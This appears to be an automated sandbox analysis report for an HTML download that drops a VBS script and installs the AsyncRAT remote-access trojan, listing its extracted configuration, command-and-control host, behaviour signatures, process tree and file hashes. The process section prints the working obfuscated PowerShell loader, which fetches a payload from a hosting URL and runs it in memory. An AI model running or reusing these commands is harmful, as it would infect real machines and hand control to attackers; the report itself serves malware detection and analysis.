Analysis
-
max time kernel
112s -
max time network
103s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
-
submitted
14-08-2024 16:09
General
-
Target
download.html
-
Size
2KB
-
MD5
7e35374ee66e34cbda7728dd0da4bf05
-
SHA1
c28f6972fe927a6a60ab17faca26739908e15da1
-
SHA256
b39759f17191cdb3a99558d1356cb855b86404e2574b60ed0c6d6289afdadc83
-
SHA512
2b4b460d88eaa420209fc07b72055772d15e242bbb81139294c70e04784392744f2b1dec85d0cf590f336d18faf93747d3eac2fd08b08cf896248a3007ff9fbf
Malware Config
Extracted
https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt
Extracted
asyncrat
1.0.7
Default
lkkoi.duckdns.org:2020
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Blocklisted process makes network request 9 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Using powershell.exe command.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 2 IoCs
-
NTFS ADS 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
-
Suspicious use of FindShellTrayWindow 39 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\download.html1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa5ac13cb8,0x7ffa5ac13cc8,0x7ffa5ac13cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4792 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6268 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2843372678765138810,17660711484281085488,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Documentacion.vbs"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bk▒Ho▒aQBi▒Hg▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒HI▒agBn▒GY▒ZQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒HU▒cgB0▒Gg▒cw▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBi▒Gk▒d▒Bi▒HU▒YwBr▒GU▒d▒▒u▒G8▒cgBn▒C8▒NQ▒1▒DY▒ZwBo▒GY▒a▒Bn▒GY▒a▒Bn▒GY▒LwBm▒GQ▒cwBm▒GQ▒cwBm▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒HM▒LwBk▒Gw▒b▒Bo▒G8▒c▒Bl▒C4▒d▒B4▒HQ▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒HU▒cgB0▒Gg▒cw▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒Mw▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒d▒B4▒HQ▒Lg▒x▒DE▒TwBU▒EE▒TwBH▒EE▒TwBJ▒FY▒TgBF▒C8▒cwBk▒GE▒bwBs▒G4▒dwBv▒GQ▒LwBz▒GE▒ZwBy▒GE▒YwBz▒GU▒Z▒▒v▒GM▒Z▒Bz▒GE▒YwBk▒C8▒ZwBy▒G8▒LgB0▒GU▒awBj▒HU▒YgB0▒Gk▒Yg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒HI▒agBn▒GY▒ZQ▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBh▒HM▒Z▒Bm▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bk▒Ho▒aQBi▒Hg▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\Documentacion.vbs');powershell -command $KByHL;3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$dzibx = '0';$rjgfe = 'C:\Users\Admin\Downloads\Documentacion.vbs';[Byte[]] $urths = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt'));[system.AppDomain]::CurrentDomain.Load($urths).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.11OTAOGAOIVNE/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $rjgfe , '_____asdf__________________-------------', $dzibx, '1', 'Roda' ));"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp678F.tmp.bat""6⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Documentacion.vbs"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bk▒Ho▒aQBi▒Hg▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒HI▒agBn▒GY▒ZQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒HU▒cgB0▒Gg▒cw▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBi▒Gk▒d▒Bi▒HU▒YwBr▒GU▒d▒▒u▒G8▒cgBn▒C8▒NQ▒1▒DY▒ZwBo▒GY▒a▒Bn▒GY▒a▒Bn▒GY▒LwBm▒GQ▒cwBm▒GQ▒cwBm▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒HM▒LwBk▒Gw▒b▒Bo▒G8▒c▒Bl▒C4▒d▒B4▒HQ▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒HU▒cgB0▒Gg▒cw▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒Mw▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒d▒B4▒HQ▒Lg▒x▒DE▒TwBU▒EE▒TwBH▒EE▒TwBJ▒FY▒TgBF▒C8▒cwBk▒GE▒bwBs▒G4▒dwBv▒GQ▒LwBz▒GE▒ZwBy▒GE▒YwBz▒GU▒Z▒▒v▒GM▒Z▒Bz▒GE▒YwBk▒C8▒ZwBy▒G8▒LgB0▒GU▒awBj▒HU▒YgB0▒Gk▒Yg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒HI▒agBn▒GY▒ZQ▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBh▒HM▒Z▒Bm▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bk▒Ho▒aQBi▒Hg▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\Documentacion.vbs');powershell -command $KByHL;3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$dzibx = '0';$rjgfe = 'C:\Users\Admin\Downloads\Documentacion.vbs';[Byte[]] $urths = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt'));[system.AppDomain]::CurrentDomain.Load($urths).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.11OTAOGAOIVNE/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $rjgfe , '_____asdf__________________-------------', $dzibx, '1', 'Roda' ));"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Documentacion.vbs"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bk▒Ho▒aQBi▒Hg▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒HI▒agBn▒GY▒ZQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒HU▒cgB0▒Gg▒cw▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBi▒Gk▒d▒Bi▒HU▒YwBr▒GU▒d▒▒u▒G8▒cgBn▒C8▒NQ▒1▒DY▒ZwBo▒GY▒a▒Bn▒GY▒a▒Bn▒GY▒LwBm▒GQ▒cwBm▒GQ▒cwBm▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒HM▒LwBk▒Gw▒b▒Bo▒G8▒c▒Bl▒C4▒d▒B4▒HQ▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒HU▒cgB0▒Gg▒cw▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒Mw▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒d▒B4▒HQ▒Lg▒x▒DE▒TwBU▒EE▒TwBH▒EE▒TwBJ▒FY▒TgBF▒C8▒cwBk▒GE▒bwBs▒G4▒dwBv▒GQ▒LwBz▒GE▒ZwBy▒GE▒YwBz▒GU▒Z▒▒v▒GM▒Z▒Bz▒GE▒YwBk▒C8▒ZwBy▒G8▒LgB0▒GU▒awBj▒HU▒YgB0▒Gk▒Yg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒HI▒agBn▒GY▒ZQ▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBh▒HM▒Z▒Bm▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bk▒Ho▒aQBi▒Hg▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\Documentacion.vbs');powershell -command $KByHL;3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$dzibx = '0';$rjgfe = 'C:\Users\Admin\Downloads\Documentacion.vbs';[Byte[]] $urths = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt'));[system.AppDomain]::CurrentDomain.Load($urths).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.11OTAOGAOIVNE/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $rjgfe , '_____asdf__________________-------------', $dzibx, '1', 'Roda' ));"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE877.tmp.bat""6⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD57f803908e5595ac7805479ffa4f4fc41
SHA142e1ba3a6f437dfcdaa03d714d56e807910fe69b
SHA25637b6b80af283174c508fcb8a5faa0854ba1ab2add391502bbd8e81c18df0ad4d
SHA512a4aff0953c7827d879f94d9503963c04146c94fef8d4183ef1d1479a787339272db362349bdffc4f0235667a9c7daf8a962c8c641c12fd90277e0c4af8dbe04d
-
Filesize
425B
MD5bb27934be8860266d478c13f2d65f45e
SHA1a69a0e171864dcac9ade1b04fc0313e6b4024ccb
SHA25685ad0d9909461517acf2e24ff116ca350e9b7000b4eefb23aa3647423c9745b4
SHA51287dd77feac509a25b30c76c119752cc25020cca9c53276c2082aef2a8c75670ef67e1e70024a63d44ae442b64f4bc464aee6691e80c525376bb7421929cfa3bb
-
Filesize
152B
MD59828ffacf3deee7f4c1300366ec22fab
SHA19aff54b57502b0fc2be1b0b4b3380256fb785602
SHA256a3d21f0fb6563a5c9d0f7a6e9c125ec3faaa86ff43f37cb85a8778abc87950f7
SHA5122e73ea4d2fcd7c8d52487816110f5f4a808ed636ae87dd119702d1cd1ae315cbb25c8094a9dddf18f07472b4deaed3e7e26c9b499334b26bdb70d4fa7f84168d
-
Filesize
152B
MD56fdbe80e9fe20761b59e8f32398f4b14
SHA1049b1f0c6fc4e93a4ba6b3c992f1d6cecf3ada1f
SHA256b7f0d9ece2307bdc4f05a2d814c947451b007067ff8af977f77f06c3d5706942
SHA512cf25c7fd0d6eccc46e7b58949c16d17ebeefb7edd6c76aa62f7ab5da52d1c6fc88bde620be40396d336789bd0d62b2162209a947d7ab69389e8c03682e880234
-
Filesize
317B
MD55e0dceabe8425784d41246aa23cbac15
SHA1f1c43e2c2ba15bf73f1b495188e27d6731ca0b21
SHA2563bd3d00fffbe12b0b6fd27b9cb1c2d48efe20e98fa1331663f83735617c1639f
SHA512a68d9ec3b0038b084b88b2f714bf1576b4f4be4d26a1ac44bf4869515281a6d4cb661d4fd13687ec619fc57448d999e07c7a7061bd206cf967f980023a5abf9a
-
Filesize
5KB
MD592d0330cf5faa161910cc98b6d5be0d3
SHA137b7292984d3fa204b7c18e5115ec8d6965bde33
SHA2562a293daef7966d80a318ef57fb172dd46ee9635546be0c8a2c48e0e563633d7a
SHA512173dcdf0f70c5735ff9294d3610d6a34e16f9357cfaf99bda94078d13251c1403832e3f722dddd886ffdcd93a687ecb5f715cd3d4a3ac494f8565f832525621b
-
Filesize
